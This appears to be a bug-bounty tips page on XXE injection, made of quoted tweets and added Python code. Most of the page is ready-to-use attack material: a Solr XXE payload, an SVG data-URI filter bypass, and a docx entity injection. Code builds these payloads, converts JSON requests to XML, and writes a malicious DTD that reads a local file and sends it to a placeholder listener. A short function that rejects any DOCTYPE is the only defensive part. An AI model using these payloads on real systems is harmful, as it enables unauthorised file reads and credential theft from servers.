# XXE

* [See an Apache Solr GET/POST to /select? Set the 'q' parameter to the following for an XXE injection: /select?q={!xmlparser v='\<!DOCTYPE a SYSTEM "http://collab.burp.net">\<a>\</a>'} - https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html… #BugBounty](https://twitter.com/huntmost/status/1195507306919804928)
* [#bugbountytip Company fixed an XXE by blocking arbitrary URL(s) used to grab an SVG? Try to bypass it by embedding the SVG using the Data URI protocol handler \[data:image/svg+xml;base64,XXE\_PAYLOAD\]; most of the time it will work! #BugBounty #TogetherWeHitHarder #infosec #infosecurity](https://twitter.com/prateek_0490/status/1046077319801184259)
* [XXE by injecting METADATA in Image bytes --> Blind SSRF via local dtd --> grabbed AWS EC2 credentials blindly --> Powned #bugbountytips #bugbountytip](https://twitter.com/HusseiN98D/status/1257825228341874689)
* [jobs.targ.com site fills in personal info by uploading a CV & parsing it. Accepted docx, pdf, etc. 1. Unzip the docx & edit word/document.xml 2. Add \<!DOCTYPE foo \[\<!ENTITY % xxe SYSTEM "http://burp.collab.net/mal.dtd"> %xxe;\]> 3. Upload 4. Profit! #BugBounty](https://twitter.com/huntmost/status/1180649484759572480)
* [#BugBountyTip time: when you see a POST request made with JSON, convert it to XML and test for XXE. You can use the "Content-type converter" extension on @Burp\_Suite to achieve this!](https://twitter.com/HusseiN98D/status/1219750207287676933)
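The two upload tips above (the data-URI SVG bypass and the docx with a rewritten word/document.xml) share one mechanic: get a DOCTYPE with an external parameter entity in front of an XML parser that the target never expected to be attacker-reachable. The block below is an added example, not code from any of the quoted tweets: it builds both payloads, shows why a filter that only blocks remote http(s) URLs lets the data: form through, and ends with the defender-side check that catches both, an expat parse that aborts on any DOCTYPE. `collab.example` stands in for an out-of-band listener, `cdn.example` is an assumed allowlisted host, the `remote_url_blocked` filter is a hypothetical reconstruction of the kind of "fix" the SVG tip describes, and the .docx is a constructed two-part minimum rather than a real CV.

```python
import base64
import io
import xml.parsers.expat
import zipfile
from urllib.parse import urlparse

# Placeholder for an out-of-band listener (Burp Collaborator or a box you
# control); collab.example is a stand-in, not a real host.
COLLAB = "http://collab.example"

# Constructed SVG whose text node dereferences an external entity.
XXE_SVG = (
    '<?xml version="1.0"?>'
    f'<!DOCTYPE svg [<!ENTITY xxe SYSTEM "{COLLAB}/svg">]>'
    '<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>'
)

# Constructed minimal .docx: only the two parts a Word-aware parser needs.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.'
    'openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>'
)
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:t>Jane Doe, Senior Engineer</w:t></w:r></w:p></w:body></w:document>'
)


def svg_to_data_uri(svg: str) -> str:
    """Wrap an SVG in the data: URI form the tip uses to dodge URL blocklists."""
    return "data:image/svg+xml;base64," + base64.b64encode(svg.encode()).decode()


def decode_data_uri(uri: str) -> bytes:
    """Server side of the same trick: recover the document bytes from the URI."""
    header, _, payload = uri.partition(",")
    if not header.startswith("data:"):
        raise ValueError("not a data: URI")
    return base64.b64decode(payload) if header.endswith(";base64") else payload.encode()


def remote_url_blocked(url: str) -> bool:
    """Hypothetical 'fix' that only blocks http(s) fetches from foreign hosts.
    Anything else, data: included, passes, which is why the bypass works."""
    p = urlparse(url)
    return p.scheme in ("http", "https") and p.hostname != "cdn.example"


def build_sample_docx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("word/document.xml", DOCUMENT_XML)
    return buf.getvalue()


def inject_docx(docx_bytes: bytes, dtd_url: str) -> bytes:
    """Re-pack the docx with a DOCTYPE that loads an external parameter entity,
    inserted right after the XML declaration of word/document.xml."""
    doctype = f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe;]>'
    src, out = zipfile.ZipFile(io.BytesIO(docx_bytes)), io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            data = src.read(name)
            if name == "word/document.xml":
                text = data.decode()
                cut = text.find("?>") + 2 if text.startswith("<?xml") else 0
                data = (text[:cut] + doctype + text[cut:]).encode()
            dst.writestr(name, data)
    return out.getvalue()


def document_xml(docx_bytes: bytes) -> str:
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        return zf.read("word/document.xml").decode()


class DoctypeRejected(Exception):
    pass


def root_element_no_doctype(xml_bytes: bytes) -> str:
    """Defender side: parse with expat but abort on any DOCTYPE, so no entity
    (internal or external) can be declared. Returns the root element name."""
    parser = xml.parsers.expat.ParserCreate()
    seen = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} rejected")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(xml_bytes, True)
    return seen[0]


def upload_accepted(xml_bytes: bytes) -> bool:
    """What a fixed endpoint should do with either the decoded SVG or each XML
    part of the docx: reject anything that declares a DOCTYPE or fails to parse."""
    try:
        root_element_no_doctype(xml_bytes)
    except (DoctypeRejected, xml.parsers.expat.ExpatError):
        return False
    return True
```

Rejecting the DOCTYPE outright is the one mitigation that works regardless of which parser library sits behind the upload; disabling only "external entities" leaves parameter-entity and billion-laughs variants to be handled separately.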

![https://twitter.com/Kei0x/status/1172267556226445313](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MMsovUDUgTb9VVW5xUZ%2F-MMtq130yvZdlpa7onJE%2Fimage.png?alt=media\&token=cb482753-fd74-430c-84f2-509472bf2fda)

* [XXE](https://twitter.com/11xuxx/status/1250764273623629826?s=20)

  1. Change-password function -> JSON
  2. Converted to XML -> 200 OK
  3. Created a DTD file on my EC2 instance and started a web server on port 80
  4. Crafted an XXE payload!
  5. Bounty!

  Always convert the POST/PUT/PATCH body to XML and resend the request; don't forget to change the Content-Type.
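Both the Burp "Content-type converter" tip further up and the five steps above describe the same procedure: take a JSON body, re-encode it as XML with the same field names, swap the Content-Type, and, once the endpoint still answers 200, put an out-of-band DOCTYPE in front of it that pulls a DTD from a host you control. The block below is an added example, not the tweet author's code or tooling: it does the conversion by hand, builds the resent request, and writes out the mal.dtd an attacker would serve for the blind exfiltration step. The JSON field names are assumed, `collab.example` is a placeholder for the EC2 web server in the tip, and `/etc/hostname` is just a small file to prove the read.

```python
import json
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed change-password body; field names are assumed, not from any target.
JSON_BODY = '{"username": "jane", "old_password": "Winter2019!", "new_password": "Spring2020!"}'

# Placeholder for the attacker-controlled web server that hosts mal.dtd.
COLLAB = "http://collab.example"


def json_to_xml(raw_json: str, root: str = "root") -> str:
    """Re-encode a JSON object as XML with the same keys, the manual version of
    what Burp's Content-type converter does. Nested objects become nested
    elements; lists repeat the element; scalars are escaped as text."""
    def emit(tag, value):
        if isinstance(value, dict):
            return f"<{tag}>" + "".join(emit(k, v) for k, v in value.items()) + f"</{tag}>"
        if isinstance(value, list):
            return "".join(emit(tag, v) for v in value)
        if value is None:
            return f"<{tag}/>"
        return f"<{tag}>{escape(str(value))}</{tag}>"
    return emit(root, json.loads(raw_json))


def xml_fields(xml_body: str) -> list:
    """Parse the converted body (stdlib ElementTree resolves no external
    entities) and list the field names, to confirm nothing was lost."""
    return [child.tag for child in ET.fromstring(xml_body)]


def as_xml_request(xml_body: str, path: str = "/api/password") -> dict:
    """The resent request: same path, XML body, and the Content-Type swap that
    the tip says not to forget. Returned as a dict so it can be inspected."""
    data = xml_body.encode()
    return {
        "method": "POST",
        "path": path,
        "headers": {"Content-Type": "application/xml", "Content-Length": str(len(data))},
        "body": data,
    }


def oob_request_body(xml_body: str, dtd_url: str) -> str:
    """Step 4: prepend a DOCTYPE that fetches and evaluates an external DTD.
    The element body is untouched, so the endpoint still handles the request."""
    return f'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe;]>{xml_body}'


def mal_dtd(collab: str, path: str = "/etc/hostname") -> str:
    """Step 3: the DTD served from the attacker's web server. It reads a local
    file into a parameter entity, then declares a second external entity whose
    URL carries that content back to the listener (the classic blind pattern)."""
    return (
        f'<!ENTITY % file SYSTEM "file://{path}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{collab}/?d=%file;\'>">\n'
        "%eval;\n%exfil;\n"
    )
```

The exfiltration DTD only works for files that are themselves well-formed in a URL (no newlines or reserved characters); for anything else, the usual move is to switch the `file://` entity to a wrapper such as `php://filter` on PHP targets, which is outside what the tip covers.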
